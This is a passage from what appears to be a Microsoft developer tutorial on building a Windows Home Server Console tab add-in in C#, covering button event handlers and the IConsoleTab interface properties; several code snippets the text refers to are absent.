// The class declaration public class HomeServerTabExtender : Microsoft.HomeServer.Extensibility.IConsoleTab { // Private fields declared private IConsoleServices services; // Declare an instance of the UserControl, ShowWHSInfoPanel private ShowWHSInfoPanel nPanel; private WHSInfoClass whsInfo; // The constructor public HomeServerTabExtender(int width, int height, IConsoleServices consoleServices) { // Initialize the private fields nPanel = new ShowWHSInfoPanel(); nPanel.Size = new Size(width, height); this.services = consoleServices; whsInfo = new WHSInfoClass(); // Hook up event handlers for the nPanel buttons nPanel.btnClearInfo.Click += new EventHandler(BtnClearInfo_Click); nPanel.btnShowInfo.Click += new EventHandler(BtnShowInfo_Click); nPanel.btnOpenSettings.Click += new EventHandler(BtnOpenSettings_Click); } }
Step 3: Code event handlers
In the section of code above, you hooked up event handlers with the click event for each of the three buttons on the
ShowWHSInfoPanel instance,
nPanel. In this step, you write the three event-handler methods.
Code the BtnShowInfo Click method
First, code the event handler for the
nPanel.btnShowInfo.Click event. When an end user clicks Show WHS Info on the Console tab pane area, the
BtnShowInfo_Click method sets the Text property for the
RichTextBox Control,
nPanel.rtShowWHSInfo, to a string that contains information about some Windows Home Server objects that are on the server.
The
BtnShowInfo_Click method creates three Array objects, and then populates each Array with objects of a given Windows Home Server type. Then, the method loops through each Array, collecting information about each item in the Array. Finally, the text property for the
nPanel.rtShowInfo
RichTextBox Control is set to the string that contains all of the collected information:
internal void BtnShowInfo_Click(object sender, EventArgs e) { string displayText; // Fill each array with WHS objects Array disks = whsInfo.GetDiskInfo(); Array volumes = whsInfo.GetVolumeInfo(); Array shares = whsInfo.GetShareInfo(); displayText = "DISK INFORMATION:\nSystem Name\t\tSize\n"; // Iterate through each array and get individual WHS object information foreach (IDiskInfo pDisk in disks) { displayText += pDisk.DevicePath.ToString() + "\t\t" + pDisk.Size.ToString() + "\n\n"; } displayText += "VOLUME INFORMATION:\nPath\t\tSize\n"; foreach (IVolumeInfo pVolume in volumes) { displayText += pVolume.Path.ToString() + "\t\t" + pVolume.Size.ToString() + "\n\n"; } displayText += "SHARE INFORMATION:\nName\t\tIs Duplicated\n"; foreach (IShareInfo pShare in shares) { displayText += pShare.Name.ToString() + "\t\t" + pShare.IsDuplicated.ToString() + "\n\n"; } // Display the collected information nPanel.rtShowWHSInfo.Text = displayText; }
Code the BtnClearInfo Click method
Next, code the event handler for the
nPanel.btnClearInfo.Click event. The
BtnClearInfo_Click method is fairly simple. It uses one line of code to clear any text from the display area of the
nPanel user control.
When an end user clicks Clear Display on the
nPanel user control, the
BtnClearInfo_Click method sets the
Text property of the
nPanel.rtShowWHSInfo
RichTextBox control to an empty string:
Code the BtnOpenSettings Click method
Finally, code the event handler for the
nPanel.btnOpenSettings.Click event. When an end user clicks Open Settings on the
nPanel user control, the Windows Home Server Settings dialog opens to the Settings tab that you specify in the
BtnOpenSettings_Click method.
The
BtnOpenSettings_Click method calls the
Microsoft.HomeServer.Extensibility.IConsoleServices.OpenSettings(System.Guid) method, passing the globally unique identifier (GUID) for a specific Settings tab as the only argument:
Step 4: Implement the TabText property
The TabText property is read-only and returns a string that contains the caption or text for the Console tab. This is the caption that describes your Console tab. For example, the TabText property for the Console tab that deals with user accounts is User Accounts.
Code the TabText property so that it returns "SDK Sample" as in the following code snippet:
Step 5: Implement the TabImage property
The TabImage property of the IConsoleTab interface returns a bitmap. This bitmap appears on the Console tab above the TabText.
Use the image file SDKSampleImg that you added as a resource to the SDKSample project in the topic Setting Up an Add-In Solution:
Step 6: Implement the TabControl property
The TabControl property returns the Control that appears on the pane area of the console when you select the tab, as mentioned in Step 1 of this topic. For the purposes of this tutorial, return the Control
nPanel UserControl, that you instantiated in the
HomeServerTabExtender class constructor.
Code the TabControl property so that it returns the Control,
nPanel:
Step 7: Implement the GetHelp() method
Use GetHelp to display Help content when an end user selects your tab and presses one of the Help keys (Help on the Windows Home Server Console or F1). You must implement the GetHelp method as part of the IConsoleTab interface, and if you are an OEM or System Builder you must hook up your own Help content to your Console tab.
The signature of the GetHelp method requires you to return a Boolean value that indicates that you will display custom Help content for your Console tab. A return value of true indicates that you will display your custom Help content.
For this tutorial, you can just display a MsgBox for your Help, but when you create an actual production tab, you may want to display a Help topic in a compiled Help file (.chm):
Step 8: Implement the SettingsGuid property
Depending upon how your add-in works, you may want to provide end users the ability to set options for your application. To do so, create a custom Settings tab on the Settings page dialog for the Windows Home Server Console. The custom Settings tab must be an implementation of the ISettingsTab interface.
For example, a user who wants to change settings for shared folders clicks the Settings button on the console. When the Settings page dialog appears, the user clicks Shared Folders in the tab area of the Settings page dialog, and then changes the settings.
You can also associate a Settings tab with a Console tab. You create the association by using the SettingsGuid property.
For the SettingsGuid property, you have two choices:
- Return a GUID for a specific Settings tab. To do this, you must return a
System.Guidobject with the GUID of the Settings tab that you want to associate with your Console tab.
- Return an empty Guid. Returning an empty
System.Guidindicates that you do not want to associate a Settings tab with your Console tab.
For this tutorial, do not use this property to create an association between the Console tab and a Settings tab because this tutorial implements a button on the Console tab pane area that opens the Settings page dialog directly.
Code the SettingsGuid so that it does not create an association with a Settings tab:
Summary
You have now created a Windows Home Server Console tab. Work through the rest of the tutorial to finish your sample add-in solution.
See Also | https://msdn.microsoft.com/en-us/library/bb626016.aspx | CC-MAIN-2018-17 | refinedweb | 1,525 | 53.21 |
jimmer 0 Posted February 5, 2005 $coord = PixelSearch(566,261,566,261,0x000000) & $coord = PixelSearch(566,281,566,281,0x000000) if @error then MouseClick("Left", 630, 308, 1, 0) Sleep(600) endif if not @error then sleep(1000) endif Alright, I would just like the first coord to work together with the second... but this code just doesn't seem to do the job? I would like both coords to work together, but I guess the "&" just won't cut it It's searching for two different pixel, (566 261) and (566 281), not (566, 261, 566, 281) so yeah.... hope you can understand my bad grammar Share this post Link to post Share on other sites | https://www.autoitscript.com/forum/topic/8298-using-two-pixel-search/ | CC-MAIN-2018-30 | refinedweb | 117 | 71.18 |
MOSS 2007 provides out-of-the box (OOTB) document conversion process. It runs as job tools in MOSS job timer, and must be executed by the user. Now, the idea is to publish page into our ResepOke.Com from email attachment – so we don’t need to go to web site anymore to create a new page.
The solution
Since the OOTB document conversion only work from limited number of filetype (for example docx into aspx) – then we can not use email format to publish to page directly. Therefore, we will create the page in docx and attach to email to publish to site. In the server, we need an event receiver to detect new incoming document and trigger document conversion process. However, instead of creating an event receiver we can use a visual studio workflow solution.
Step-by-Step
1. Configure document library to receive from email
2. Create a component/class to extract embedded image and store into site images library.
3. Create a componen/class to launch document conversion process. You need correct transformer ID,
public class Tranformer
{
public const string Docx = “{6dfdc5b4-2a28-4a06-b0c6-ad3901e3a807}”;
public const string Docm = “{888d770d-d3e9-4d60-8267-3c05ab059ef5}”;
public const string Infopath = “{853d58f5-13c3-46f8-8b81-3ca4abcad7b3}”;
public const string Xsl = “{2798ee32-2961-4232-97dd-1a76b9aa6c6f}”;
}
4. Incorporate all component into visual studio workflow solution and deploy to the site. The workflow will check for docx document and execute image parsing and document conversion process.
5. Add workflow to site and attach to the document. Don’t forget to set-up start-up option of the workflow too.
And voila, if you send email to [email protected], then your page will be automatically published. | https://blog.libinuko.com/2007/04/11/moss-2007-publishing-page-from-email-workflow/ | CC-MAIN-2019-13 | refinedweb | 285 | 56.05 |
Using Vb.net 2013 Winforms, Create an XML file that matches Sample XML file Using A Class Created form XSD files using the microsoft tool [login to view URL] to create the classfor the vb project
Budjetti $30-250 USD
Do not bid if you are not familiar with [login to view URL], xml files or xsd files. This project is for creating a vb.net 2008 or 2013 project that creates an xml file that matches exactly the xml sample file in the attached. I don't want to just create the xml file from scratch, I want to create a class based on the xsd files and then utilize that class to create the xml file. [login to view URL] is a tool that takes a xsd file and creates a class that can be included into an existing visual studio project. When creating the class please make sure the /l option is utilized and the VB language is selected and that the /n option is selected with the following namespace Tx_Transactions_V_1_5. It looks to me like the [login to view URL] is the main xsd file that the class needs to be based on. Please don't modify any xsd files or the class created from xsd.exe.
Again, please don't bid on this project if you are not familiar with [login to view URL], xml files or xsd files | https://www.fi.freelancer.com/projects/vb-net/using-net-winforms-create-xml/ | CC-MAIN-2019-35 | refinedweb | 234 | 71.28 |
To gain access to all feature's geometries in a feature class, just do the following:
import arcpy from arcpy import env fc = r"c:\temp\data.shp" geoms = arcpy.CopyFeatures_management(fc, arcpy.Geometry()) for g in geoms: print g.extent
This sample allows anyone to directly access the geometries of the input feature class without having to use the Cursor objects.
The same idea can be applied to other functions to the analysis function as well:
import arcpy from arcpy import env fc = r"c:\temp\data.shp" geom = arcpy.Buffer_analysis(fc, arcpy.Geometry(), "100 Feet", "FULL", "ROUND")[0] print geom.extent
Here the buffer tool outputs a single geometry to the geom object and the extent is displayed.
Where this becomes really powerful is when you need to perform geometry operations on your data, and want to put the results back into that row.
import arcpy from arcpy import env fc = r"c:\temp\data.shp" with arcpy.da.UpdateCursor(fc, ["SHAPE@"]) as urows: for urow in urows: geom = arcpy.Buffer_analysis(urow[0], arcpy.Geometry(), "100 Feet", "FULL", "ROUND")[0] row[0] = geom urows.updateRow(urow) del urow del geom
Assuming that the input is a polygon, this snippet shows how geometries can be used as inputs and outputs thus allowing for easy insertion back into the original row.
Hope this helps!
2 comments:
Thanks for a "hot" tips for GIS objects.
in your last example, you also could have used the built in buffer method for geometry objects:
urow[0] = urow[0].buffer(100)
mind you the 100 is in whatever units your data is in.
also, line 7 should say urow[0] instead or row[0]
Great post, not enough people using the geometry objects. | http://anothergisblog.blogspot.com/2013/11/geometry-objects-make-life-easier.html | CC-MAIN-2017-22 | refinedweb | 289 | 58.08 |
Code, Ctrl-P) and if the IDE can figure out the method signature of the method call surrounding the caret, it will display the parameter list, and show the current parameter in bold. As you move the caret around, the tooltip will be updated to show which parameter you're currently editing.
Messing with the user's editing workflow is always risky, so please let me know how you feel the new code completion behavior works. The parameter tooltip depends on being able to figure out the signature of the surrounding method call, which depends on type inference, so it may not always work - but it will also improve as I tweak and improve type analysis across code completion, goto declaration, etc.
Also, there is also a Go To Test action now for jumping quickly between a test class and its unit test. Should work in Rails, RSpec, ZenTest, and also between any classes named Foo, FooTest or TestFoo regardless of which files they're in. This action is in the editor context menu, and is bound to Ctrl-Shift-E. To get this stuff, get at least version 0.65 of the Ruby Feature module (see these installation instructions).
P.S. You can find some more information on the Ruby support in an interview I did with Geertjan Wielenga a couple of weeks ago. There are some other interviews in the same series talking about the new language support in NetBeans. The Rails support in NetBeans will soon have improved support for JavaScript, YAML, and RHTML - stay tuned!(2007-04-10 23:59:52.0) Permalink Comments [26]
Posted by Romain Guy on April 11, 2007 at 12:11 AM PDT #
Yes, the Java editor also has this functionality!
Posted by Tor Norbye on April 11, 2007 at 12:27 AM PDT #
Posted by Romain Guy on April 11, 2007 at 01:53 AM PDT #
Posted by Scott Walter on April 11, 2007 at 06:14 AM PDT #
Posted by Casper on April 11, 2007 at 07:30 AM PDT #
Posted by Ralph on April 11, 2007 at 01:57 PM PDT #
Posted by Ralph on April 11, 2007 at 01:59 PM PDT #
Posted by Ralph on April 11, 2007 at 02:31 PM PDT #
the Mac keybindings recently got broken; up until Milestone 7 this worked. I've been involed in some e-mails on the subject; I'll make sure there's a high priority bug filed on this.
Yes, you need to use Ctrl-Space to invoke code completion. I used to have it auto-activated on "." but got some complaints that it was getting in the way. (It -does- auto activate on ::, e.g. Test::Unit:: will show TestCase and friends).
Hi Scott, we do have an alias named dev@scripting.netbeans.org dedicated to this but there isn't a lot of traffic yet; it's mostly being done through the issue tracker - and a lot of the feedback is coming in through the blog right now :)
Posted by Tor Norbye on April 11, 2007 at 02:38 PM PDT #
Posted by Tor Norbye on April 11, 2007 at 02:51 PM PDT #
Posted by Ralph on April 12, 2007 at 08:15 AM PDT #
Big problem with Ruby, when you define a class, you don't specify the types of its arguments. I concede that is SO powerful but, in many cases, we would probably be better served by giving the IDE a hint of the class we are passing, using some kind of annotations.
The Sapphire Steel guys, which are doing what I believe is a very nice work to get good Intellisense, let you use optional comments in a special format before the declaration and have the ide parse them to infer the types of arguments and return value.
They refer this as "Type assertions" and this is a sample:
Example:
#:return:=>Array
#:arg:names=>Array
#:arg:aName=>String
def addName( names, aName )
return names << aName
end
So, when you later type addName(, the autocomplete shows this tooltip:
addName( names:Array, aName:String):Array
I don't want to start a religion war on typed vs. typeless languages. Truth is I may be wrong but, coming from a Java background, I miss so much a good autocomplete capability in the IDE.
The keyword here is OPTIONAL; since you don't have to do it if you don't like it, it would be only for the rest of us who would really appreciate this feature.
However, if in the end you decide to implement this feature, I think it would be nice to follow the syntax of Sapphire, so the code can be more easily transferred and we avoid creating Ruby dialects. Or, a "Save as Sapphire Comments" or similar can be also a good option.
Anyway, thanks for your great work.
Jose Femenias, (big fan of Java Posse)
P.S.: Sample was taken from this page
Posted by Jose Femenias on April 12, 2007 at 11:12 AM PDT #
Hi Jose, as of the latest version type assertions are supported. I have looked into this before (and it's part of my JavaOne talk on Ruby tooling), and type assertions are definitely controversial - especially if it's used by code completion to tell you the expected type of methods (since that seems to restrict Ruby's duck typing). On the other hand, it can help your productivity in your own methods if you annotate them with these in that code completion can be more direct. So that's the part I have implemented - type assertions will help the type inference engine when you're using code completion inside that method. They are not propagated to clients elsewhere (yet - something to discuss).
To get these features you need the very latest builds - deadlock build #913 or later (but the Ruby build is not running now; it's waiting for the upstream trunk build to build successfully - so give it a little while.)
Posted by Tor Norbye on April 13, 2007 at 11:56 AM PDT #
Posted by Steven Herod on April 14, 2007 at 04:45 AM PDT #
Ruby1-985 complained today about not meeting the requirements for language support. Looks like it's relying on the next nightly build of Netbeans IDE (ver. 17-04-06 was mentioned in the error).
So, instead of building Netbeans myself, I'm trying out the RubyIDE build. Are there any outstanding issues related to running on Mac? You mentioned there were some problems a while back wiuth keybindings, packaging etc.
Posted by Si on April 17, 2007 at 01:08 AM PDT #
Don't worry about previous question. Since I'm in a different timezone (Italy), I've plenty of time to find out how the IDE build fares. The Wiki info is up to date on current IDE build issues I think.
Do you want rhtml bug reports yet, or would it be better to wait?
Posted by Si on April 17, 2007 at 02:40 AM PDT #
thanks a lot for the support for type assertions and the very quick answer. I understand the subject could be controversial because it seems restricting; that's why I insisted on the optional nature of the implementation. Hopefully, this will satisfy most of us...(But, you know, "You can SATISFY some of the people all of the time, and all of the people some of the time, but you can not SATISFY all of the people all of the time"; hope Mr. Lincoln forgives me for the paraphrasing ) I'm willing to test the feature ASAP.
Thanks AGAIN!
Posted by Jose Femenias on April 17, 2007 at 09:35 AM PDT #
Posted by Ralph on April 17, 2007 at 10:48 AM PDT #
Hi Si, it's still a bit early for RHTML bug reports - a bunch of new stuff landed yesterday (code completion in the HTML part, a navigator) but unfortunately it's affected regular Ruby editing a bit. We'll get this ironed out in the next couple of days. Again, Milestone 9 should be a good build to use and report bugs on.
Jose, yep - we can't satisfy everybody :) But hopefully this is a good start.
Posted by Tor Norbye on April 17, 2007 at 05:49 PM PDT #
Is there a work-in-progress cheatsheet floating around for functions and features currenting being developed/WIP? I'd sure like to see things like how to actually USE the abbreviations that you've just added as well as standard other functions that we're not familiar with. NB is very new for most rubists and we need a little hand holding to get started, especially for whiz-bang features that really will sell us on it.
Posted by Ralph on April 18, 2007 at 08:13 PM PDT #
Also, when typing, for example: "assert_redirected_to :action => 'index'" it does not start autocompleting "asser"... as it seems that it should just by virtue of inspecting Rails. Seems that the autocomplete is not fully baked yet or am I missing something?
Posted by Ralph on April 18, 2007 at 08:18 PM PDT #
Posted by Ralph on April 18, 2007 at 08:21 PM PDT #
Posted by Sergey Kuznetsov on April 19, 2007 at 08:47 AM PDT #
Posted by ylon on April 19, 2007 at 04:16 PM PDT #
Regarding CSS auto completion - the CSS and JavaScript support is being revamped right now - as is RHTML and embedding of these other languages, but I'm not sure exactly how far along it is yet.
Sergey, yep - I got your e-mail - it got buried in my inbox (33,286 messages right now and counting) but I just fired off a reply (and filed an enhancement request on your behalf in Issuezilla.)
Ylon - yes, I have a dark theme I'm using - inspired by the BlueTheme for TextMate. It works okay for Ruby - but I haven't at all tweaked it for other files, such as RHTML. If you want to try it, e-mail me - and maybe we can work together to polish it such that we can spread it more widely.
Posted by Tor Norbye's Weblog on April 25, 2007 at 11:46 AM PDT #
By the way, here's what it looks like:.
Note however that the rest of the IDE - including code completion popups and such - uses the look and feel of the application, which at least in my case stays white and Mac-like. The one area which is problematic is editor highlights like breakpoints, which don't seem to be configurable by theme - and the breakpoint colors don't work well with a dark theme. I'm going to ping somebody to see what can be done about this.
Posted by Tor Norbye's Weblog on April 25, 2007 at 11:55 AM PDT # | http://blogs.sun.com/tor/entry/ruby_screenshot_of_the_week8 | crawl-001 | refinedweb | 1,819 | 64.24 |
Hello everyone, I am Naz Islam and I am a Java developer.
Looking for learning new tricks in Java and helping others. am Naz Islam and I am a Java developer.
Looking for learning new tricks in Java and helping others.
Thank you.
hello could you help with this the drawing doesn't upload
// code begins here
import javax.swing.*;
import java.awt.*;
public class ColorPanel extends JPanel {
public ColorPanel(Color backColor) {
setBackground(backColor);
}
public void paintComponent(Graphics g)
{
super.paintComponent(g);
g.setColor(Color.blue);
g.drawString("hello", 100, 45);
I think your code is almost right. However, I think you need JFrame in order to have graphics on the screen. Notice ColorPanel uses Graphics in order to draw string on the screen. In Main class, I have created an instance of JFrame and ColorPanel. Since the constructor of ColorPanel takes a color argument, I passed Color.BLACK. Finally, I've added that to the frame. Hope this helps. Let me know your comments
Main.java
ColorPanel.java
Last edited by nazislam; January 22nd, 2019 at 02:04 AM. Reason: Updated formatting.
I am a Java developer and I blog about Java programming, web development and algorithm design.
You may follow me on twitter @nazalislam.
If you don't understand my answer, don't ignore it, ask a question. | https://www.javaprogrammingforums.com/member-introductions/41649-hello.html | CC-MAIN-2019-47 | refinedweb | 220 | 52.36 |
App lifecycle
This topic describes the lifecycle of a Windows Runtime app, from the time it is deployed through its removal. By launching, suspending, and resuming your app appropriately, you ensure that your customer has the best possible experience with your app.
App execution state
This illustration represents the transitions between app execution states. We describe these states and events in the next several sections. For more info about each state transition and what your app should do in response, see the reference for the ApplicationExecutionState enumeration.
Deployment
In order for an app to be activated in any way, it must first be deployed. Basic deployment is taken care of either when a user installs your app or when you use Visual Studio to build and run your app locally during development and testing. For more info on this and on advanced deployment scenarios, see App packages and deployment.
App launch
An app is launched whenever it is activated by the user and the app process was previously in the NotRunning state. An app could be in the NotRunning state because it has never been launched, because it was running but then crashed, or because it was suspended but then couldn't be kept in memory and was terminated by the system.
When an app is launched, Windows displays a splash screen for the app. To configure this splash screen, see "Adding a splash screen" (HTML or XAML).
While the splash screen is displayed, your app code should ensure that the app is ready for its user interface to be displayed to the user. The primary tasks for the app are to register event handlers and set up any custom UI it needs for loading the initial page. "How to extend the splash screen" (HTML or XAML) and the Splash screen sample for more info. After the app completes activation, it enters the Running state and the splash screen disappears (and all its resources and objects are cleared). Showing a window, returning from the activation handler, and completing a deferral are specific ways that an app completes activation. For more info, see "How to activate an app" (HTML or XAML).
App activation
An app can be activated by the user through a variety of contracts and extensions. To participate in activation, your app must register to receive the WinJS activated event (HTML) or override the OnActivated method (XAML). (For HTML, WebUIApplication.activated is another event you can handle for activation.)
Your app's activation code can test to see why it was activated and whether it was already in the Running state. Apps can be activated using any of these activation types:
Apps that are built for Windows 8.1 and later can be activated by any of the above, or can be activated with these activation types.
Windows Phone apps can be activated with these types.
Your app can use activation to restore previously saved data in the event that the operating system terminates your app, and subsequently the user re-launches it. Windows may terminate your app after it has been suspended for a number of reasons. The user may manually close your app, or sign out, or the system may be running low on resources. If the user launches your app after Windows has terminated it, the app receives an activated event (HTML) or Application.OnActivated callback (XAML) and the user sees the splash screen of your app until the app is activated. You can use this event to determine whether your app needs to restore the data which it had saved when it was last suspended, or whether you must load your app’s default data. Because the splash screen is up, your app code can invest some processing time to get this done without there being any apparent delay to the user, but previously-mentioned concerns about long-running operations also apply if you're restarting or continuing. The activated/OnActivated event data includes a PreviousExecutionState property that tells you which state your app was in before it was activated. This property is one of the values from the ApplicationExecutionState enumeration:
PreviousExecutionState could also have a value of Running or Suspended, but in these cases your app was not previously terminated and therefore you don’t have to worry about restoring data.
Note
If you log on using the computer's Administrator account, you can't activate any Windows Runtime app.
For more info, see App extensions.
OnActivated versus specific activations in a XAML app
For the XAML activation model and Application class, the OnActivated method is the means to handle all possible activation types. However, it's more common to use different methods to handle the most common activation types, and use OnActivated only as the fallback method for the less common activation types. For example, Application has an OnLaunched method that's invoked as a callback whenever ActivationKind is Launch, and this is the typical activation for most apps. There are 6 more On* methods for specific activations: OnCachedFileUpdaterActivated, OnFileActivated, OnFileOpenPickerActivated, OnFileSavePickerActivated, OnSearchActivated, OnShareTargetActivated. Starting templates for a XAML app have an implementation for OnLaunched and a handler for Suspending, with both of these incorporating methods from the
SuspensionManager class that comes predefined in each template. Describing what
SuspensionManager does is outside the scope of this topic; for more info see C#, VB, and C++ project templates for apps.
App suspend
An app can be suspended when the user switches away from it or when the device enters a low power state. Most apps are suspended when the user switches away from them.
When the user moves an app to the background, Windows waits a few seconds to see whether the user immediately switches back to the app. If the user does not switch back within this time window, Windows suspends the app.
If an app has registered an event handler for the WinJS checkpoint event (for HTML) or the Application.Suspending event (for XAML), this code is called immediately before the app is suspended. You can use the event handler to save relevant app and user data. We recommended that you use the application data APIs for this purpose because they are guaranteed to complete before the app enters the Suspended state. For more info, see Accessing app data with the Windows Runtime. You should also release exclusive resources and file handles so that other apps can access them while your app isn't using them.
Generally, your app should save its state and release its exclusive resources and file handles immediately when handling the suspending event, and the code should not take more than a second to complete. If an app does not return from the suspending event within 5 seconds on Windows and between 1 and 10 seconds on Windows Phone, Windows assumes that the app has stopped responding and terminates it.
Windows attempts to keep as many suspended apps in memory as possible. Keeping these apps in memory ensures that users can quickly and reliably switch between suspended apps. However, if there aren't enough resources to keep your app in memory, Windows can terminate your app. Individual functions as it did before it was suspended.
There are some app scenarios where the app must continue to run to complete background tasks. For example, your app can continue to play audio in the background; for more info, see "How to play audio in the background" (HTML or XAML). Also, background transfer operations continue even if your app is suspended or even terminated; for more info, see "How to download a file" (HTML or XAML).
For guidelines, see Guidelines for app suspend and resume.
For example code, see "How to suspend an app" (HTML or XAML).
App visibility
When the user switches from your app to another app, your app is no longer visible but remains in the Running state until Windows can suspend it. If the user switches away from your app but activates or switches back to it before it can suspended, the app remains in the Running state.
Your app doesn't receive an activation event when app visibility changes, because the app is still running. Windows simply switches to and from the app as necessary. If your app needs to do something when the user switches away and back, it can handle the visibilitychange event (for HTML) or Window.VisibilityChanged event (for XAML).
The visibility event is not serialized with the suspend app data is lost, so long WebUIApplication.resuming event (HTML) or Application.Resuming event (XAML), it is called when the app is resumed from the Suspended state. You can refresh your app content and data using this event handler.
HTML apps usually don't need to handle resuming specifically, because activated fires in the same circumstances. You can use ActivationKind info from the activated event data to determine whether the app is resuming; this pattern is shown in the default.js file for starting project templates.
If a suspended app is activated to participate in an app contract or extension, it receives the Resuming event first, then the "How to resume an app" (HTML or XAML).
Note In Windows Phone Store apps, for a XAML app, Windows.
In Windows 8.1 and later, after an app has been closed by the user, the app is removed from the screen and switch list but not explicitly ApplicationView.TerminateAppOnFinalViewClose property.
If an app has registered an event handler for the Windows or by the user.. If you're maintaining a Windows 8 app, note that the handling for ClosedByUser is potentially different than for a Windows 8.1 app.
We recommend that apps not close themselves programmatically unless absolutely necessary. For example, if an app detects a memory leak, it can close itself to ensure the security of the user's personal data. When you close an app programmatically, the system files in the Documents or Pictures libraries.
App lifecycle and the Visual Studio project templates
For either HTML or XAML apps, basic code that is relevant for app lifecycle is provided in the starting Visual Studio project templates. The basic app handles launch activation and displays its primary UI even before you've added any of your own code. For more info, see JavaScript project templates for Store apps or C#, VB, and C++ project templates for apps.
Application lifecycle key APIs
- Windows.ApplicationModel namespace
- Windows.ApplicationModel.Activation namespace
- Windows.ApplicationModel.Core namespace
- Windows.UI.WebUI namespace (HTML)
- Windows.UI.Xaml.Application class (XAML)
- Windows.UI.Xaml.Window class (XAML)
- WinJS.Application namespace (HTML)
Related topics | https://msdn.microsoft.com/en-US/library/windows/apps/hh464925.aspx | CC-MAIN-2016-36 | refinedweb | 1,761 | 53.51 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.